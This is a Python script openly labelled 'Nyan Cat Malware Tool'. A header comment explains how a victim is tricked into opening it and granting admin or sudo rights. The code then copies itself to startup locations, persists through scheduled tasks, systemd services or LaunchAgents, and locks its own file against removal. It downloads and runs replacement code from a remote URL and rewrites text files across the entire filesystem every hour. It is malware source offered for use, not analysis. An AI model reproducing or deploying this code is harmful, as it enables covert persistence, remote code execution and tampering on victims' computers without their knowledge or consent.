Nyan Cat Malware Tool

1. #   To execute this malware, the user must first download and open the malicious file, which could be disguised as something harmless. Upon execution, the script will attempt to escalate privileges: on Windows, it will prompt the user with a User Account Control (UAC) window to allow the script to run with administrator rights; on Linux or macOS, the script will ask the user for their sudo password to gain root access. This is the only point of required interaction where the user needs to authorize the script. Once the user grants the necessary privileges, the script proceeds autonomously by replicating itself, creating persistence mechanisms (such as scheduled tasks or system services), altering text files, preventing removal, checking for updates from the attacker's server, and even restarting itself if terminated. After granting elevated privileges, no further user interaction is needed, and the malware operates silently in the background without the victim's knowledge or consent.
2.  
3.  
4. import os
5. import sys
6. import fnmatch
7. import logging
8. import requests
9. import shutil
10. import subprocess
11. import platform
12. import getpass
13. import ctypes
14. import time
15. import stat
16. import psutil
17.  
18. GITHUB_RAW_URL = "https://raw.githubusercontent.com/YourRepo/YourProject/main/script.py"
19.  
20. logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
21.  
22. SELF_PATH = os.path.abspath(__file__)
23. PERSISTENT_LOCATIONS = {
24.     "Windows": os.path.join(os.getenv("APPDATA"), "Microsoft", "Windows", "Start Menu", "Programs", "Startup", "system_service.exe"),
25.     "Linux": os.path.expanduser("~/.local/bin/system_service"),
26.     "Darwin": os.path.expanduser("~/Library/LaunchAgents/com.system.service.plist")
27. }
28.  
29. IGNORE_PATTERNS = ["*.exe", "*.dll", "*.bin", "*.sys", "/proc/*", "/dev/*", "/sys/*", "*.iso", "*.img"]
30.  
31. TEXT_EXTENSIONS = {'.txt', '.csv', '.log', '.json', '.xml', '.md', '.py', '.cs', '.java', '.html', '.css', '.js'}
32.  
33. def check_admin():
34.     if platform.system() == "Windows":
35.         return ctypes.windll.shell32.IsUserAnAdmin() != 0
36.     else:
37.         return os.geteuid() == 0
38.  
39. def elevate_privileges():
40.     if check_admin():
41.         logging.info("Already running with elevated privileges.")
42.         return
43.  
44.     if platform.system() == "Windows":
45.         logging.info("Requesting admin privileges...")
46.         ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
47.         sys.exit()
48.     else:
49.         logging.info("Requesting sudo privileges...")
50.         os.execvp("sudo", ["sudo", sys.executable] + sys.argv)
51.  
52. def should_ignore(file_path):
53.     return any(fnmatch.fnmatch(file_path, pattern) for pattern in IGNORE_PATTERNS)
54.  
55. def is_text_file(file_path):
56.     return os.path.splitext(file_path)[1].lower() in TEXT_EXTENSIONS
57.  
58. def normalize_line_endings(file_path):
59.     try:
60.         with open(file_path, 'rb') as f:
61.             content = f.read()
62.         normalized_content = content.replace(b'\r\n', b'\n') if platform.system() == "Windows" else content.replace(b'\r', b'\n')
63.  
64.         if content != normalized_content:
65.             with open(file_path, 'wb') as f:
66.                 f.write(normalized_content)
67.             logging.info(f'Normalized: {file_path}')
68.     except Exception as e:
69.         logging.error(f'Error processing {file_path}: {e}')
70.  
71. def process_directory(root_dir):
72.     for dirpath, _, filenames in os.walk(root_dir):
73.         for filename in filenames:
74.             file_path = os.path.join(dirpath, filename)
75.             if not should_ignore(file_path) and is_text_file(file_path):
76.                 normalize_line_endings(file_path)
77.  
78. def anti_removal():
79.     system = platform.system()
80.     if system == "Windows":
81.         add_read_only_attribute(SELF_PATH)
82.     elif system == "Linux" or system == "Darwin":
83.         set_immutable_attribute(SELF_PATH)
84.  
85. def add_read_only_attribute(file_path):
86.     try:
87.         os.chmod(file_path, stat.S_IREAD)
88.         logging.info(f"Set file to read-only: {file_path}")
89.     except Exception as e:
90.         logging.error(f"Failed to set file to read-only: {e}")
91.  
92. def set_immutable_attribute(file_path):
93.     try:
94.         subprocess.run(["chattr", "+i", file_path], check=False)
95.         logging.info(f"Set file as immutable: {file_path}")
96.     except Exception as e:
97.         logging.error(f"Failed to set immutable attribute: {e}")
98.  
99. def self_replicate():
100.     system = platform.system()
101.     target_path = PERSISTENT_LOCATIONS.get(system)
102.  
103.     if not target_path:
104.         logging.error("Unsupported OS for self-replication.")
105.         return
106.  
107.     try:
108.         if not os.path.exists(target_path):
109.             shutil.copy(SELF_PATH, target_path)
110.             logging.info(f"Self-replicated to {target_path}")
111.        
112.         if system == "Windows":
113.             register_windows_startup(target_path)
114.         elif system == "Linux":
115.             register_linux_service(target_path)
116.         elif system == "Darwin":
117.             register_mac_service(target_path)
118.     except Exception as e:
119.         logging.error(f"Self-replication failed: {e}")
120.  
121. def register_windows_startup(exec_path):
122.     task_name = "SystemService"
123.     command = f'schtasks /create /tn "{task_name}" /tr "{exec_path}" /sc onlogon /rl highest /f'
124.     subprocess.run(command, shell=True, check=False)
125.     logging.info(f"Windows startup task '{task_name}' registered.")
126.  
127. def register_linux_service(exec_path):
128.     service_path = "/etc/systemd/system/system_service.service"
129.     service_content = f"""
130. [Unit]
131. Description=System Service
132. After=network.target
133.  
134. [Service]
135. ExecStart={exec_path}
136. Restart=always
137. User={getpass.getuser()}
138. StandardOutput=journal
139.  
140. [Install]
141. WantedBy=multi-user.target
142.    """
143.     try:
144.         with open(service_path, "w") as f:
145.             f.write(service_content)
146.         subprocess.run(["systemctl", "enable", "system_service"], check=False)
147.         subprocess.run(["systemctl", "start", "system_service"], check=False)
148.         logging.info("Linux systemd service registered.")
149.     except Exception as e:
150.         logging.error(f"Failed to register systemd service: {e}")
151.  
152. def register_mac_service(exec_path):
153.     plist_path = PERSISTENT_LOCATIONS["Darwin"]
154.     plist_content = f"""
155. <?xml version="1.0" encoding="UTF-8"?>
156. <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
157. <plist version="1.0">
158. <dict>
159.    <key>Label</key>
160.    <string>com.system.service</string>
161.    <key>ProgramArguments</key>
162.    <array>
163.        <string>{exec_path}</string>
164.    </array>
165.    <key>RunAtLoad</key>
166.    <true/>
167. </dict>
168. </plist>
169.    """
170.     try:
171.         with open(plist_path, "w") as f:
172.             f.write(plist_content)
173.         subprocess.run(["launchctl", "load", plist_path], check=False)
174.         logging.info("macOS LaunchAgent registered.")
175.     except Exception as e:
176.         logging.error(f"Failed to register LaunchAgent: {e}")
177.  
178. def prevent_process_termination():
179.     pid = os.getpid()
180.     try:
181.         while True:
182.             if pid not in [p.info['pid'] for p in psutil.process_iter(['pid', 'name'])]:
183.                 logging.info("Process terminated, restarting...")
184.                 os.execv(sys.executable, [sys.executable] + sys.argv)
185.             time.sleep(10)
186.     except Exception as e:
187.         logging.error(f"Error in process termination prevention: {e}")
188.  
189. def check_for_updates():
190.     try:
191.         response = requests.get(GITHUB_RAW_URL, timeout=5)
192.         if response.status_code == 200:
193.             new_script = response.text
194.             if new_script.strip() != open(SELF_PATH, "r").read().strip():
195.                 with open(SELF_PATH, "w") as f:
196.                     f.write(new_script)
197.                 logging.info("Updated successfully. Restarting...")
198.                 os.execv(sys.executable, [sys.executable] + sys.argv)
199.     except Exception as e:
200.         logging.error(f"Update check failed: {e}")
201.  
202. def execute_on_open():
203.     try:
204.         logging.info("Executing script upon open.")
205.         check_admin() or elevate_privileges()
206.         self_replicate()
207.         anti_removal()
208.         check_for_updates()
209.  
210.         while True:
211.             logging.info("Scanning system for text files to normalize...")
212.             process_directory("/")
213.             logging.info("Normalization cycle complete. Sleeping for an hour...")
214.             time.sleep(3600)
215.  
216.     except Exception as e:
217.         logging.error(f"Error during execution: {e}")
218.  
219. if __name__ == "__main__":
220.     execute_on_open()